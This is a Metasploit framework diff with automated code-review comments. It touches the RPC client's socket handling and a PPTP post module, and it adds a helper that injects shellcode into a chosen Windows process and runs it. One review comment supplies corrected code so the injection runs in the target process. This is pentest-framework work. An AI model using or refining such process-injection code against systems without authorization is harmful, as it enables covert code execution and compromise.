diff --git a/lib/msf/core/exploit/smb/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb
index 3ba505c6cf..069f97f167 100644
--- a/lib/msf/core/exploit/smb/psexec.rb
+++ b/lib/msf/core/exploit/smb/psexec.rb
@@ -9,7 +9,7 @@ module Msf
 #
 # This code was stolen straight out of the psexec module. Thanks very
 # much for all who contributed to that module!! Instead of uploading
-# and runing a binary.
+# and running a binary.
 ####
 module Exploit::Remote::SMB::Psexec
diff --git a/lib/msf/core/post/windows/process.rb b/lib/msf/core/post/windows/process.rb
new file mode 100644
index 0000000000..7ec019563d
--- /dev/null
+++ b/lib/msf/core/post/windows/process.rb
@@ -0,0 +1,40 @@
+# -*- coding: binary -*-
+
+module Msf
+class Post
+module Windows
+
+module Process
+
+ #
+ # Injects shellcode to a process, and executes it.
+ #
+ # @param shellcode [String] The shellcode to execute
+ # @param base_addr [Fixnum] The base address to allocate memory
+ # @param pid [Fixnum] The process ID to inject to
+ #
+ # @return [Boolean] True if successful, otherwise false
+ #
+ def execute_shellcode(shellcode, base_addr, pid=nil)
+ pid ||= session.sys.process.getpid
+ host = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
+ shell_addr = host.memory.allocate(shellcode.length, nil, base_addr)
+ if host.memory.write(shell_addr, shellcode) < shellcode.length
+ vprint_error("Failed to write shellcode")
+ return false
+ end
+
+ vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})")
+ ret = session.railgun.kernel32.CreateThread(nil, 0, shell_addr, nil, 0, nil)
+ if ret['return'] < 1
+ vprint_error("Unable to CreateThread")
+ return false
+ end
+
+ true
+ end
+
+end # Process
+end # Windows
+end # Post
+end # Msf
diff --git a/lib/msf/core/rpc/v10/client.rb b/lib/msf/core/rpc/v10/client.rb
index 144e3570df..4379bcf874 100644
--- a/lib/msf/core/rpc/v10/client.rb
+++ b/lib/msf/core/rpc/v10/client.rb
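Review bot: The thread is created in the wrong process whenever `pid` names a process other than the current one: the shellcode is written through `host`, the handle opened on `pid`, but `session.railgun.kernel32.CreateThread(nil, 0, shell_addr, nil, 0, nil)` executes in the Meterpreter host's own process, where `shell_addr` is either unmapped or points at unrelated memory, so the likely outcome is a crash of the local session rather than execution in the target. Creating the thread through the same handle the write went through (the stdapi process object's thread subsystem, `host.thread.create(shell_addr, 0)`, assuming that is the API this session type exposes; confirm against the Rex stdapi Process class) keeps allocation, write and execution in one address space. The `PROCESS_ALL_ACCESS` handle returned by `session.sys.process.open` is never closed on any path, and the result of `host.memory.allocate` is not checked before `memory.write`, so if allocate can fail without raising the write goes to a nil address. The tail of the method could look like the following, releasing the handle in an `ensure`.
```ruby
    vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})")
    # Create the thread via the same process handle the shellcode was written
    # through, not via railgun in the local process.
    thread = host.thread.create(shell_addr, 0)
    unless thread
      vprint_error("Unable to create thread in pid #{pid}")
      return false
    end

    true
  ensure
    # PROCESS_ALL_ACCESS handle must not outlive the call
    host.close if host
  end
```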
@@ -12,7 +12,7 @@ module RPC
 class Client
- attr_accessor :sock, :token, :info
+ attr_accessor :token, :info
 def initialize(info={})
@@ -67,6 +67,7 @@ class Client
 )
 res = @cli.send_recv(req)
+ @cli.close
 if res and [200, 401, 403, 500].include?(res.code)
 resp = MessagePack.unpack(res.body)
@@ -82,8 +83,10 @@ class Client
 end
 def close
- self.sock.close rescue nil
- self.sock = nil
+ if @cli and @cli.conn?
+ @cli.close
+ end
+ @cli = nil
 end
 end
diff --git a/modules/post/windows/manage/pptp_tunnel.rb b/modules/post/windows/manage/pptp_tunnel.rb
index 99fe2eacf1..3f0b9af181 100644
--- a/modules/post/windows/manage/pptp_tunnel.rb
+++ b/modules/post/windows/manage/pptp_tunnel.rb
@@ -5,11 +5,15 @@
 # http://metasploit.com/framework/
 ##
+require 'msf/core/post/common'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/registry'
+
 class Metasploit3 < Msf::Post
- include Msf::Post::Windows::Priv
 include Msf::Post::Common
 include Msf::Post::File
+ include Msf::Post::Windows::Priv
 include Msf::Post::Windows::Registry
 def initialize(info={})
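Review bot: Dropping `:sock` from `attr_accessor` removes a public reader and writer from `Client`, so any external caller that reads `client.sock` now raises NoMethodError instead of getting nil; the commit message does not say whether this is intended as a breaking change. If the socket is now owned by `@cli`, a deprecated read-only shim keeps old callers working: `def sock; @cli && @cli.conn; end`, assuming the Rex HTTP client exposes its connection as `conn` (the `conn?` predicate used in `close` suggests so, but confirm). The `Client` class continues outside this hunk.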
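Review bot: `close` no longer tolerates a failing teardown: the old `self.sock.close rescue nil` swallowed everything, whereas the new `@cli.close` is called bare, so a connection already reset by the peer can raise out of a method callers treat as best-effort cleanup (whether Rex's HTTP client `close` rescues internally is not visible here; if it does not, rescue the socket error locally rather than reintroducing a blanket `rescue nil`). As a point of style, `if @cli and @cli.conn?` uses `and`, which binds more loosely than `&&` and is the form the Ruby style guide flags for boolean logic; `if @cli && @cli.conn?` is equivalent here and avoids precedence surprises. Since the earlier hunk also closes `@cli` right after every `send_recv`, `conn?` will usually be false by the time `close` runs, so this branch mainly covers the path where `send_recv` raised before its `@cli.close`.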